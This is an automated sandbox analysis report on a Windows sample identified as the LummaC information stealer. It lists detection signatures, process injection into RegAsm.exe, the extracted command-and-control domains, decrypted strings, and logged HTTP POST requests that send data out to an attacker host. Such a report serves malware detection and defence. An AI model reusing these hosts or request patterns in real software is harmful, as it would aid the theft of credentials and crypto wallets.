Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PASS-1234.exe

Overview

General Information

Sample name:PASS-1234.exe
Analysis ID:1429198
MD5:91a6507a51ddcf98f542e89c58b9a17e
SHA1:870a96273698fc67cf145a7601fc3892671eea22
SHA256:aca438e378d0fd7abdb1fc1f7cc9acdc279dbd399fda98f8078a99a4a24e537a
Tags:exeredlinestealer
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PASS-1234.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\PASS-1234.exe" MD5: 91A6507A51DDCF98F542E89C58B9A17E)
    • RegAsm.exe (PID: 5104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "sideindexfollowragelrew.pw"], "Build id": "LPnhqo--@warefromware"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: RegAsm.exe PID: 5104JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        Timestamp:04/21/24-09:04:55.909755
        SID:2049958
        Source Port:55278
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "sideindexfollowragelrew.pw"], "Build id": "LPnhqo--@warefromware"}
        Source: sideindexfollowragelrew.pwVirustotal: Detection: 23%Perma Link
        Source: sideindexfollowragelrew.pwVirustotal: Detection: 23%Perma Link
        Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
        Source: https://productivelookewr.shop/apiVirustotal: Detection: 14%Perma Link
        Source: https://productivelookewr.shop/apisVirustotal: Detection: 9%Perma Link
        Source: PASS-1234.exeVirustotal: Detection: 33%Perma Link
        Source: PASS-1234.exeJoe Sandbox ML: detected
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: demonstationfukewko.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: liabilitynighstjsko.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: alcojoldwograpciw.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: incredibleextedwj.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shortsvelventysjo.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shatterbreathepsw.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tolerateilusidjukl.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: productivelookewr.shop
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sideindexfollowragelrew.pw
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000001.00000002.1747486028.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--@warefromware
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041545B CryptUnprotectData,1_2_0041545B
        Source: PASS-1234.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: PASS-1234.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\befqhkpyn\Knonzzz.pdb source: PASS-1234.exe
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D95B4B FindFirstFileExW,0_2_00D95B4B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9602F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D9602F
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00DFC0C8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then cmp word ptr [esi+ebx], 0000h0_2_00DE0718
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ecx, dword ptr [esp+34h]0_2_00DFC9C8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_00DE0C58
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_00DE0C58
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 542C2D52h0_2_00E01858
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 15BD542Ch0_2_00E01C08
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00DE2388
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov edx, dword ptr [esp+00000080h]0_2_00DE69B8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_00DCF8A8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00DCFD58
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx1_2_0041507B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_004173DF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_004173DF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+20h]1_2_0041545B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]1_2_00402570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+00000080h]1_2_00420580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 15BD542Ch1_2_0043B7D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]1_2_00425878
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]1_2_00409920
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax1_2_004209C1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]1_2_00435C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]1_2_00438E4E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041BF50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax1_2_00406060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]1_2_00424085
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx1_2_00414170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]1_2_0042410D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00422C09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax1_2_00439256
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax1_2_00439254
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+ebx], 0000h1_2_0041A2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_004232F3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00422BCC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], dl1_2_00424397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000810h]1_2_00424397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000A10h]1_2_00424397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]1_2_00424397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], dl1_2_00424394
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000810h]1_2_00424394
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000A10h]1_2_00424394
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]1_2_00424394
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_004393B6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_004393B4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], cl1_2_00409470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 542C2D52h1_2_0043B420
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000810h]1_2_00423D4E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000A10h]1_2_00423D4E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]1_2_00423D4E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+34h]1_2_00436590
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h1_2_00417770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]1_2_0041085D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h1_2_0041A820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]1_2_0041A820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0040FA70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041AB60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_00413C7A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00413C12
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00413AF8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [eax+edi], 00000000h1_2_00422CDB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]1_2_00422CDB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]1_2_00407C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]1_2_00410DB5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_00413EF6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00431F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, dl1_2_00433F1A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, dl1_2_00433F30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al1_2_00415F38
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, bl1_2_00439FC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov bh, byte ptr [esi+ecx]1_2_00421FA5

        Networking

        barindex
        Source: TrafficSnort IDS: 2049958 ET TROJAN Lumma Stealer Related Domain in DNS Lookup (sideindexfollowragelrew .pw) 192.168.2.4:55278 -> 1.1.1.1:53
        Source: Malware configuration extractorURLs: demonstationfukewko.shop
        Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
        Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
        Source: Malware configuration extractorURLs: incredibleextedwj.shop
        Source: Malware configuration extractorURLs: shortsvelventysjo.shop
        Source: Malware configuration extractorURLs: shatterbreathepsw.shop
        Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
        Source: Malware configuration extractorURLs: productivelookewr.shop
        Source: Malware configuration extractorURLs: sideindexfollowragelrew.pw
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 62Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18171Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8792Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20445Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7092Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1417Host: productivelookewr.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584469Host: productivelookewr.shop
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownDNS traffic detected: queries for: sideindexfollowragelrew.pw
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: productivelookewr.shop
        Source: PASS-1234.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: PASS-1234.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
        Source: PASS-1234.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
        Source: PASS-1234.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: PASS-1234.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: PASS-1234.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: PASS-1234.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: PASS-1234.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: PASS-1234.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: PASS-1234.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
        Source: PASS-1234.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: PASS-1234.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
        Source: PASS-1234.exeString found in binary or memory: http://ocsp.digicert.com0A
        Source: PASS-1234.exeString found in binary or memory: http://ocsp.digicert.com0C
        Source: PASS-1234.exeString found in binary or memory: http://ocsp.digicert.com0H
        Source: PASS-1234.exeString found in binary or memory: http://ocsp.digicert.com0I
        Source: PASS-1234.exeString found in binary or memory: http://ocsp.digicert.com0X
        Source: PASS-1234.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: RegAsm.exe, 00000001.00000002.1747903838.0000000001562000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1747804223.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1747804223.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://productivelookewr.shop/
        Source: RegAsm.exe, 00000001.00000002.1748220978.00000000037C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://productivelookewr.shop/api
        Source: RegAsm.exe, 00000001.00000002.1748220978.00000000037C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://productivelookewr.shop/apis
        Source: PASS-1234.exeString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.250:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042DBB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_0042DBB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042DBB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_0042DBB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042E1F7 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,1_2_0042E1F7
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D483180_2_00D48318
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D7487A0_2_00D7487A
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00DFC9C80_2_00DFC9C8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D74C940_2_00D74C94
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D750C00_2_00D750C0
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D8125D0_2_00D8125D
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00DFD2380_2_00DFD238
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00DA13FF0_2_00DA13FF
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D754DA0_2_00D754DA
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D8125D0_2_00D8125D
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00E015180_2_00E01518
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D918BA0_2_00D918BA
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00E018580_2_00E01858
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D7594B0_2_00D7594B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D75DCF0_2_00D75DCF
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00DF9F180_2_00DF9F18
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D5E1700_2_00D5E170
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D762400_2_00D76240
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D924820_2_00D92482
